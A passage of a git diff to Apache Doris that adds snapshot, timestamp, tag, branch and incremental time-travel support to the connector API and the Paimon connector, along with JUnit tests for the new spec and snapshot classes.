org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; import org.apache.doris.connector.api.pushdown.ConnectorExpression; import java.util.Collections; @@ -72,6 +73,20 @@ default ConnectorTableSchema getTableSchema( "getTableSchema not implemented"); } + /** + * Returns the schema AT {@code snapshot.getSchemaId()} — the schema as of the + * pinned snapshot, for time-travel reads under schema evolution. + * + *

    The default ignores the snapshot and returns the latest schema via + * {@link #getTableSchema(ConnectorSession, ConnectorTableHandle)}. A connector that + * supports schema-at-snapshot overrides this to resolve the schema version.

    + */ + default ConnectorTableSchema getTableSchema( + ConnectorSession session, ConnectorTableHandle handle, + ConnectorMvccSnapshot snapshot) { + return getTableSchema(session, handle); + } + /** Returns a name-to-handle map for all columns of the table. */ default Map getColumnHandles( ConnectorSession session, ConnectorTableHandle handle) { diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java index a023027db4e1e6..7a16661ff84099 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java @@ -36,12 +36,14 @@ public final class ConnectorMvccSnapshot { private final long snapshotId; private final long timestampMillis; private final String description; + private final long schemaId; private final Map properties; private ConnectorMvccSnapshot(Builder b) { this.snapshotId = b.snapshotId; this.timestampMillis = b.timestampMillis; this.description = b.description; + this.schemaId = b.schemaId; this.properties = b.properties.isEmpty() ? Collections.emptyMap() : Collections.unmodifiableMap(new HashMap<>(b.properties)); @@ -62,6 +64,14 @@ public String getDescription() { return description; } + /** + * Schema version of this snapshot (e.g. paimon schemaId). {@code -1} = unknown + * ⇒ schema-aware reads fall back to the latest schema. + */ + public long getSchemaId() { + return schemaId; + } + /** Connector-specific metadata propagated to BE. Unmodifiable, never null. */ public Map getProperties() { return properties; @@ -76,6 +86,7 @@ public static final class Builder { private long snapshotId; private long timestampMillis; private String description = ""; + private long schemaId = -1; private final Map properties = new HashMap<>(); public Builder snapshotId(long snapshotId) { @@ -88,6 +99,11 @@ public Builder timestampMillis(long timestampMillis) { return this; } + public Builder schemaId(long schemaId) { + this.schemaId = schemaId; + return this; + } + public Builder description(String description) { this.description = Objects.requireNonNull(description, "description"); return this; diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpec.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpec.java new file mode 100644 index 00000000000000..f71a3852ae7a49 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpec.java @@ -0,0 +1,196 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.mvcc; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import java.util.Objects; + +/** + * Immutable, source-agnostic description of an explicit time-travel request that + * fe-core extracts from the SQL and hands to the connector to resolve into a + * pinned {@link ConnectorMvccSnapshot}. + * + *

    fe-core performs only source-agnostic dispatch/extraction (deciding the + * {@link Kind}, splitting out the raw string / params, and the digital flag for + * timestamps); the connector owns ALL provider-specific parsing (e.g. paimon + * snapshot-id lookup, datetime parsing, tag/branch resolution, incremental + * window validation).

    + * + *

    Each {@link Kind} maps to a piece of Doris time-travel syntax:

    + *
      + *
    • {@link Kind#SNAPSHOT_ID} — {@code FOR VERSION AS OF }: + * {@code stringValue} holds the snapshot-id digits.
    • + *
    • {@link Kind#TIMESTAMP} — {@code FOR TIME AS OF }: + * {@code stringValue} holds either an epoch-millis literal (when + * {@code digital} is {@code true}) or a datetime string to be parsed by + * the connector (when {@code digital} is {@code false}).
    • + *
    • {@link Kind#TAG} — {@code @tag('name')} scan param: + * {@code stringValue} holds the tag name.
    • + *
    • {@link Kind#BRANCH} — {@code @branch('name')} scan param: + * {@code stringValue} holds the branch name.
    • + *
    • {@link Kind#INCREMENTAL} — {@code @incr(...)} scan param: + * {@code stringValue} is {@code null} and {@code incrementalParams} + * carries the raw key/value window arguments.
    • + *
    + */ +public final class ConnectorTimeTravelSpec { + + /** Which flavor of explicit time-travel this spec describes. */ + public enum Kind { + /** {@code FOR VERSION AS OF }. */ + SNAPSHOT_ID, + /** {@code FOR TIME AS OF }. */ + TIMESTAMP, + /** {@code @tag('name')}. */ + TAG, + /** {@code @branch('name')}. */ + BRANCH, + /** {@code @incr(...)}. */ + INCREMENTAL + } + + private final Kind kind; + private final String stringValue; + private final boolean digital; + private final Map incrementalParams; + + private ConnectorTimeTravelSpec(Kind kind, String stringValue, boolean digital, + Map incrementalParams) { + this.kind = kind; + this.stringValue = stringValue; + this.digital = digital; + this.incrementalParams = (incrementalParams == null || incrementalParams.isEmpty()) + ? Collections.emptyMap() + : Collections.unmodifiableMap(new HashMap<>(incrementalParams)); + } + + /** + * {@code FOR VERSION AS OF }: pin by snapshot id. + * + * @param idDigits the snapshot-id digits (connector parses to a number) + */ + public static ConnectorTimeTravelSpec snapshotId(String idDigits) { + Objects.requireNonNull(idDigits, "idDigits"); + return new ConnectorTimeTravelSpec(Kind.SNAPSHOT_ID, idDigits, false, null); + } + + /** + * {@code FOR TIME AS OF }: pin by wall-clock time. + * + * @param value epoch-millis literal when {@code digital} is true, otherwise a + * datetime string the connector parses with the session time zone + * @param digital whether {@code value} is already epoch-millis + */ + public static ConnectorTimeTravelSpec timestamp(String value, boolean digital) { + Objects.requireNonNull(value, "value"); + return new ConnectorTimeTravelSpec(Kind.TIMESTAMP, value, digital, null); + } + + /** + * {@code @tag('name')}: pin to a named tag. + * + * @param name the tag name + */ + public static ConnectorTimeTravelSpec tag(String name) { + Objects.requireNonNull(name, "name"); + return new ConnectorTimeTravelSpec(Kind.TAG, name, false, null); + } + + /** + * {@code @branch('name')}: pin to a named branch. + * + * @param name the branch name + */ + public static ConnectorTimeTravelSpec branch(String name) { + Objects.requireNonNull(name, "name"); + return new ConnectorTimeTravelSpec(Kind.BRANCH, name, false, null); + } + + /** + * {@code @incr(...)}: incremental read over a window described by + * {@code rawParams}. The connector validates and interprets the window keys. + * + * @param rawParams the raw key/value window arguments (defensively copied) + */ + public static ConnectorTimeTravelSpec incremental(Map rawParams) { + Objects.requireNonNull(rawParams, "rawParams"); + return new ConnectorTimeTravelSpec(Kind.INCREMENTAL, null, false, rawParams); + } + + /** The flavor of this spec; never null. */ + public Kind getKind() { + return kind; + } + + /** + * The snapshot-id digits / timestamp expression / tag name / branch name, + * depending on {@link #getKind()}. {@code null} for {@link Kind#INCREMENTAL}. + */ + public String getStringValue() { + return stringValue; + } + + /** + * Only meaningful for {@link Kind#TIMESTAMP}: {@code true} means + * {@link #getStringValue()} is already epoch-millis, {@code false} means it is + * a datetime string the connector must parse. Always {@code false} otherwise. + */ + public boolean isDigital() { + return digital; + } + + /** + * The raw incremental window arguments; non-empty only for + * {@link Kind#INCREMENTAL}, an unmodifiable empty map otherwise. Never null. + */ + public Map getIncrementalParams() { + return incrementalParams; + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof ConnectorTimeTravelSpec)) { + return false; + } + ConnectorTimeTravelSpec that = (ConnectorTimeTravelSpec) o; + return digital == that.digital + && kind == that.kind + && Objects.equals(stringValue, that.stringValue) + && incrementalParams.equals(that.incrementalParams); + } + + @Override + public int hashCode() { + return Objects.hash(kind, stringValue, digital, incrementalParams); + } + + @Override + public String toString() { + return "ConnectorTimeTravelSpec{" + + "kind=" + kind + + ", stringValue=" + stringValue + + ", digital=" + digital + + ", incrementalParams=" + incrementalParams + + '}'; + } +} diff --git a/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorMetadataTimeTravelDefaultsTest.java b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorMetadataTimeTravelDefaultsTest.java new file mode 100644 index 00000000000000..f602fcf0b71350 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorMetadataTimeTravelDefaultsTest.java @@ -0,0 +1,89 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api; + +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.connector.api.mvcc.ConnectorTimeTravelSpec; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.Optional; + +/** + * Pins the default behavior of the two B5b time-travel SPI seams on a connector that does + * NOT override them. + * + *

    WHY this matters: these defaults are the zero-behavior-change contract for the + * other connectors. {@code resolveTimeTravel} must default to {@code empty()} (a connector + * without time-travel resolves nothing, and the engine then surfaces a user error rather than + * silently reading latest). The snapshot-aware {@code getTableSchema} overload must default to + * delegating to the 2-arg latest variant — if it ignored the delegation a non-evolving + * connector would return null/throw on time-travel reads.

    + */ +public class ConnectorMetadataTimeTravelDefaultsTest { + + /** A no-method handle; the defaults under test never inspect it. */ + private static final ConnectorTableHandle HANDLE = new ConnectorTableHandle() { + }; + + /** + * Minimal metadata that overrides ONLY the 2-arg latest {@code getTableSchema}, so the test + * can prove the 3-arg snapshot-aware default routes back to it. + */ + private static final class LatestOnlyMetadata implements ConnectorMetadata { + static final ConnectorTableSchema LATEST = + new ConnectorTableSchema("t", Collections.emptyList(), null, Collections.emptyMap()); + + @Override + public ConnectorTableSchema getTableSchema(ConnectorSession session, + ConnectorTableHandle handle) { + return LATEST; + } + } + + @Test + public void resolveTimeTravelDefaultsToEmpty() { + ConnectorMetadata metadata = new LatestOnlyMetadata(); + ConnectorTimeTravelSpec spec = ConnectorTimeTravelSpec.snapshotId("1"); + + // MUTATION: a default that returned a fabricated snapshot would make a non-MVCC connector + // silently honor FOR VERSION AS OF instead of erroring. + Optional resolved = + metadata.resolveTimeTravel(null, HANDLE, spec); + Assertions.assertFalse(resolved.isPresent(), + "a connector without time-travel must resolve nothing by default"); + } + + @Test + public void snapshotAwareGetTableSchemaDelegatesToLatest() { + LatestOnlyMetadata metadata = new LatestOnlyMetadata(); + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(9L) + .schemaId(2L) + .build(); + + // MUTATION: a default that returned null (or threw) instead of delegating to the 2-arg + // variant would break time-travel reads on any connector that does not override it. + ConnectorTableSchema schema = metadata.getTableSchema(null, HANDLE, snapshot); + Assertions.assertSame(LatestOnlyMetadata.LATEST, schema, + "default snapshot-aware getTableSchema must return the latest schema unchanged"); + } +} diff --git a/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshotTest.java b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshotTest.java new file mode 100644 index 00000000000000..c5665f72f96e17 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshotTest.java @@ -0,0 +1,74 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.mvcc; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * Contracts for the additive {@code schemaId} field on {@link ConnectorMvccSnapshot} + * (B5b schema-at-pinned-snapshot support). + * + *

    WHY this matters: {@code schemaId} carries the resolved schema version of a + * pinned snapshot so a time-travel read under schema evolution can fetch the schema AS OF + * that snapshot. The unset default MUST be {@code -1} (= unknown) so every pre-existing + * builder caller keeps reading the latest schema with zero behavior change; the existing + * fields must round-trip unchanged so adding the field did not perturb them.

    + */ +public class ConnectorMvccSnapshotTest { + + @Test + public void schemaIdDefaultsToMinusOneWhenUnset() { + // WHY: -1 is the "unknown => fall back to latest schema" sentinel. Every existing builder + // caller (which never calls schemaId(..)) must observe -1, i.e. zero behavior change. + // MUTATION: defaulting the builder field to 0 makes this red and would wrongly pin schema 0. + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(7L) + .build(); + Assertions.assertEquals(-1L, snapshot.getSchemaId(), + "unset schemaId must default to -1 (unknown => latest schema)"); + } + + @Test + public void builderSetsSchemaId() { + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .schemaId(3L) + .build(); + // MUTATION: a builder that ignored schemaId (returned -1) makes this red. + Assertions.assertEquals(3L, snapshot.getSchemaId()); + } + + @Test + public void existingFieldsRoundTripUnaffectedBySchemaId() { + // WHY: the schemaId addition is purely additive; the other fields must carry through + // exactly as before so no existing consumer regresses. + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder() + .snapshotId(11L) + .timestampMillis(1700000000000L) + .description("d") + .property("scan.snapshot-id", "11") + .schemaId(2L) + .build(); + + Assertions.assertEquals(11L, snapshot.getSnapshotId()); + Assertions.assertEquals(1700000000000L, snapshot.getTimestampMillis()); + Assertions.assertEquals("d", snapshot.getDescription()); + Assertions.assertEquals("11", snapshot.getProperties().get("scan.snapshot-id")); + Assertions.assertEquals(2L, snapshot.getSchemaId()); + } +} diff --git a/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpecTest.java b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpecTest.java new file mode 100644 index 00000000000000..bbf9a82034abc6 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpecTest.java @@ -0,0 +1,145 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.mvcc; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * Contracts for {@link ConnectorTimeTravelSpec}, the source-agnostic carrier fe-core uses + * to hand an explicit time-travel request to a connector for resolution. + * + *

    WHY this matters: each factory must stamp exactly one {@link + * ConnectorTimeTravelSpec.Kind} and leave the irrelevant fields null/empty — the + * connector dispatches on {@code kind} and reads only the field that kind owns, so a wrong + * kind or a leaked field silently routes a query to the wrong time-travel branch. The map + * must be defensively copied and unmodifiable so a later mutation of the caller's map cannot + * change an already-resolved spec, and equals/hashCode must include every field so a spec + * cannot be confused with a same-named spec of a different kind/flag.

    + */ +public class ConnectorTimeTravelSpecTest { + + @Test + public void snapshotIdFactorySetsOnlySnapshotKind() { + ConnectorTimeTravelSpec spec = ConnectorTimeTravelSpec.snapshotId("42"); + // MUTATION: a factory that stamped TIMESTAMP/TAG here would route the digits down the + // wrong connector branch. + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.SNAPSHOT_ID, spec.getKind()); + Assertions.assertEquals("42", spec.getStringValue()); + Assertions.assertFalse(spec.isDigital(), "digital is only meaningful for TIMESTAMP"); + Assertions.assertTrue(spec.getIncrementalParams().isEmpty(), + "non-incremental specs carry no incremental params"); + } + + @Test + public void timestampFactoryCarriesDigitalFlagBothWays() { + // WHY: digital decides whether the connector treats the value as epoch-millis or as a + // datetime string to parse; flipping it changes the resolved instant. Lock both states. + ConnectorTimeTravelSpec epoch = ConnectorTimeTravelSpec.timestamp("1700000000000", true); + ConnectorTimeTravelSpec text = ConnectorTimeTravelSpec.timestamp("2024-01-01 00:00:00", false); + + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.TIMESTAMP, epoch.getKind()); + Assertions.assertTrue(epoch.isDigital(), "epoch-millis literal must be digital=true"); + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.TIMESTAMP, text.getKind()); + Assertions.assertFalse(text.isDigital(), "datetime string must be digital=false"); + } + + @Test + public void tagAndBranchFactoriesAreDistinctKinds() { + // WHY: tag and branch carry the same shape (a name in stringValue) but resolve via + // different SDK paths; if the factory collapsed them to one kind the connector would + // pick the wrong resolution path. + ConnectorTimeTravelSpec tag = ConnectorTimeTravelSpec.tag("v1"); + ConnectorTimeTravelSpec branch = ConnectorTimeTravelSpec.branch("v1"); + + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.TAG, tag.getKind()); + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.BRANCH, branch.getKind()); + Assertions.assertEquals("v1", tag.getStringValue()); + Assertions.assertEquals("v1", branch.getStringValue()); + // Same name, different kind => must not be equal (else a tag query reuses a branch result). + Assertions.assertNotEquals(tag, branch); + } + + @Test + public void incrementalFactoryHasNullStringValueAndParams() { + Map raw = new HashMap<>(); + raw.put("startSnapshotId", "1"); + raw.put("endSnapshotId", "5"); + ConnectorTimeTravelSpec spec = ConnectorTimeTravelSpec.incremental(raw); + + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.INCREMENTAL, spec.getKind()); + // MUTATION: stuffing a stringValue for INCREMENTAL would mislead a connector that keys + // off stringValue presence. + Assertions.assertNull(spec.getStringValue(), + "INCREMENTAL carries its args in the params map, not stringValue"); + Assertions.assertEquals(raw, spec.getIncrementalParams()); + } + + @Test + public void incrementalParamsAreDefensivelyCopiedAndUnmodifiable() { + Map raw = new HashMap<>(); + raw.put("startSnapshotId", "1"); + ConnectorTimeTravelSpec spec = ConnectorTimeTravelSpec.incremental(raw); + + // WHY (Rule 9): a spec is a resolved request; mutating the caller's source map afterwards + // must NOT retroactively change the spec the engine already dispatched on. + // MUTATION: storing the map by reference (no copy) makes this assertion red. + raw.put("endSnapshotId", "5"); + Assertions.assertFalse(spec.getIncrementalParams().containsKey("endSnapshotId"), + "spec must snapshot the params at construction, not alias the caller's map"); + + Assertions.assertThrows(UnsupportedOperationException.class, + () -> spec.getIncrementalParams().put("x", "y"), + "exposed params map must be unmodifiable"); + } + + @Test + public void equalsAndHashCodeIncludeAllFields() { + // WHY: two specs that differ in digital alone (or kind alone) are genuinely different + // time-travel targets; equals/hashCode must separate them or a cache could serve the wrong + // pinned snapshot. + ConnectorTimeTravelSpec a = ConnectorTimeTravelSpec.timestamp("100", true); + ConnectorTimeTravelSpec b = ConnectorTimeTravelSpec.timestamp("100", true); + ConnectorTimeTravelSpec digitalFlipped = ConnectorTimeTravelSpec.timestamp("100", false); + + Assertions.assertEquals(a, b); + Assertions.assertEquals(a.hashCode(), b.hashCode()); + // MUTATION: dropping `digital ==` from equals makes this red. + Assertions.assertNotEquals(a, digitalFlipped, + "specs differing only by the digital flag must not be equal"); + } + + @Test + public void factoriesRejectNullMeaningfulArgs() { + // WHY: a null where a snapshot id / name / params map is required is a programming error in + // the fe-core extractor; fail loud at construction rather than NPE deep in the connector. + Assertions.assertThrows(NullPointerException.class, + () -> ConnectorTimeTravelSpec.snapshotId(null)); + Assertions.assertThrows(NullPointerException.class, + () -> ConnectorTimeTravelSpec.timestamp(null, true)); + Assertions.assertThrows(NullPointerException.class, + () -> ConnectorTimeTravelSpec.tag(null)); + Assertions.assertThrows(NullPointerException.class, + () -> ConnectorTimeTravelSpec.branch(null)); + Assertions.assertThrows(NullPointerException.class, + () -> ConnectorTimeTravelSpec.incremental(null)); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java index 723c48d73df7b9..e3e062936ecbca 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java @@ -23,12 +23,17 @@ import org.apache.paimon.catalog.Identifier; import org.apache.paimon.partition.Partition; import org.apache.paimon.schema.Schema; +import org.apache.paimon.schema.TableSchema; import org.apache.paimon.table.DataTable; +import org.apache.paimon.table.FileStoreTable; import org.apache.paimon.table.Table; +import org.apache.paimon.tag.Tag; +import org.apache.paimon.types.DataField; import java.io.FileNotFoundException; import java.util.List; import java.util.Map; +import java.util.Optional; import java.util.OptionalLong; /** @@ -98,8 +103,106 @@ void dropTable(Identifier identifier, boolean ignoreIfNotExists) */ boolean snapshotExists(Table table, long snapshotId); + // ---- B5b-2a: explicit time-travel resolution (SNAPSHOT_ID / TIMESTAMP / TAG) ---- + // Like the T20 lookups above, these return plain {@code long}s / small immutable structs (never + // a raw paimon {@code Snapshot} / {@code Tag} / {@code TableSchema}) so the metadata layer's + // resolution logic is unit-testable offline with {@code RecordingPaimonCatalogOps}. + + /** + * Returns the schema version (schemaId) of the snapshot with {@code snapshotId} + * ({@code snapshotManager().snapshot(id).schemaId()}), or empty when it cannot be resolved. + * Used to stamp {@link org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot#getSchemaId()} + * for snapshot-id / timestamp time-travel so schema-at-snapshot reads pick the historical schema. + */ + OptionalLong snapshotSchemaId(Table table, long snapshotId); + + /** + * Resolves the named tag to its snapshot id + schema id ({@code tagManager().get(tagName)}; + * a paimon {@code Tag} IS-A {@code Snapshot}, so {@code tag.id()} / {@code tag.schemaId()}), or + * empty when no tag with {@code tagName} exists. Legacy + * {@code PaimonUtil.getPaimonSnapshotByTag} threw on absent; this returns empty (the metadata + * layer maps empty → {@link java.util.Optional#empty()} per the SPI empty-if-none contract). + */ + Optional getSnapshotByTag(Table table, String tagName); + + /** + * Returns the schema AS OF {@code schemaId} ({@code schemaManager().schema(schemaId)}), reduced + * to the fields + partition keys + primary keys the metadata layer needs to build Doris columns. + * Mirrors legacy {@code PaimonExternalTable.initSchema(schemaId)}, which read the same + * {@code tableSchema.fields()} / {@code tableSchema.partitionKeys()} of the pinned version. + */ + PaimonSchemaSnapshot schemaAt(Table table, long schemaId); + + // ---- B5b-2c: branch time-travel resolution ---- + + /** + * Returns true iff {@code branchName} exists on {@code table}. The base table must be a + * {@code FileStoreTable} (cast + {@code branchManager().branchExists(name)}, mirroring legacy + * PaimonUtil.resolvePaimonBranch); a non-FileStoreTable backend (e.g. jdbc-only) cannot have + * branches, so this returns {@code false} gracefully (the metadata layer maps that to + * Optional.empty(), which the fe-core consumer later translates to "can't find branch"). + */ + boolean branchExists(Table table, String branchName); + void close() throws Exception; + /** + * Immutable carrier for a resolved tag: the tag's snapshot id and schema id. Lets the metadata + * layer pin without depending on a concrete paimon {@code Tag} (impractical to fake offline). + */ + final class TagSnapshot { + private final long snapshotId; + private final long schemaId; + + public TagSnapshot(long snapshotId, long schemaId) { + this.snapshotId = snapshotId; + this.schemaId = schemaId; + } + + /** The tag's snapshot id ({@code tag.id()}). */ + public long snapshotId() { + return snapshotId; + } + + /** The tag's schema id ({@code tag.schemaId()}). */ + public long schemaId() { + return schemaId; + } + } + + /** + * Immutable carrier for a schema AS OF a schemaId: the paimon fields plus the partition-key and + * primary-key name lists. Returned by {@link #schemaAt} so the metadata layer can map columns + * offline without faking a concrete paimon {@code TableSchema}. + */ + final class PaimonSchemaSnapshot { + private final List fields; + private final List partitionKeys; + private final List primaryKeys; + + public PaimonSchemaSnapshot(List fields, List partitionKeys, + List primaryKeys) { + this.fields = fields; + this.partitionKeys = partitionKeys; + this.primaryKeys = primaryKeys; + } + + /** The schema's fields ({@code tableSchema.fields()}). */ + public List fields() { + return fields; + } + + /** The schema's partition key names ({@code tableSchema.partitionKeys()}). */ + public List partitionKeys() { + return partitionKeys; + } + + /** The schema's primary key names ({@code tableSchema.primaryKeys()}). */ + public List primaryKeys() { + return primaryKeys; + } + } + /** * Default implementation backing the seam with a real Paimon {@link Catalog}. * Each method is a thin delegation; the {@code Catalog} is the only state. @@ -187,6 +290,41 @@ public boolean snapshotExists(Table table, long snapshotId) { } } + @Override + public OptionalLong snapshotSchemaId(Table table, long snapshotId) { + // snapshotManager() is only on DataTable (same cast legacy PaimonUtil uses). snapshot(id) + // returns the Snapshot whose schemaId is the version pinned for schema-at-snapshot. + Snapshot snapshot = ((DataTable) table).snapshotManager().snapshot(snapshotId); + return snapshot == null ? OptionalLong.empty() : OptionalLong.of(snapshot.schemaId()); + } + + @Override + public Optional getSnapshotByTag(Table table, String tagName) { + // tagManager() is only on DataTable. A paimon Tag IS-A Snapshot, so id()/schemaId() are + // inherited (legacy PaimonUtil.getPaimonSnapshotByTag read the Tag the same way). + Optional tag = ((DataTable) table).tagManager().get(tagName); + return tag.map(t -> new TagSnapshot(t.id(), t.schemaId())); + } + + @Override + public PaimonSchemaSnapshot schemaAt(Table table, long schemaId) { + // schemaManager() is only on DataTable. schema(schemaId) is the historical TableSchema + // (legacy PaimonExternalTable.initSchema(schemaId) reads the same accessors). + TableSchema tableSchema = ((DataTable) table).schemaManager().schema(schemaId); + return new PaimonSchemaSnapshot( + tableSchema.fields(), tableSchema.partitionKeys(), tableSchema.primaryKeys()); + } + + @Override + public boolean branchExists(Table table, String branchName) { + // Mirrors legacy PaimonUtil.resolvePaimonBranch: only a FileStoreTable has a + // branchManager(); a non-FileStoreTable backend (e.g. jdbc-only) cannot have branches. + if (!(table instanceof FileStoreTable)) { + return false; + } + return ((FileStoreTable) table).branchManager().branchExists(branchName); + } + @Override public void close() throws Exception { catalog.close(); diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 073501cbb1bc63..213ff9139bc0e2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -97,7 +97,7 @@ public ConnectorScanPlanProvider getScanPlanProvider() { /** * Declares the E5 read-path capabilities paimon supports: MVCC snapshot pinning and time travel * (FOR TIME TRAVEL / FOR VERSION AS OF). The B5 fe-core MvccTable wiring keys off these to call - * {@link PaimonConnectorMetadata#beginQuerySnapshot} / {@code getSnapshotAt} / {@code getSnapshotById}. + * {@link PaimonConnectorMetadata#beginQuerySnapshot} / {@code resolveTimeTravel}. * No write capability is declared: paimon write is not migrated. */ @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 330e12d7ced946..388fbf00ab8852 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -28,6 +28,7 @@ import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.connector.api.mvcc.ConnectorTimeTravelSpec; import org.apache.doris.connector.api.pushdown.ConnectorExpression; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.thrift.THiveTable; @@ -36,6 +37,7 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import org.apache.paimon.CoreOptions; import org.apache.paimon.catalog.Catalog; import org.apache.paimon.catalog.Identifier; import org.apache.paimon.partition.Partition; @@ -148,25 +150,71 @@ public ConnectorTableSchema getTableSchema( // resolveTable branches on isSystemTable() to pick the 4-arg sys Identifier vs the 2-arg // base Identifier on a transient-table-null reload, so a sys handle reads its OWN rowType. Table table = resolveTable(paimonHandle); - RowType rowType = table.rowType(); - List primaryKeys = table.primaryKeys(); - List columns = mapFields(rowType, primaryKeys); + // The LATEST path keys partition_columns off the 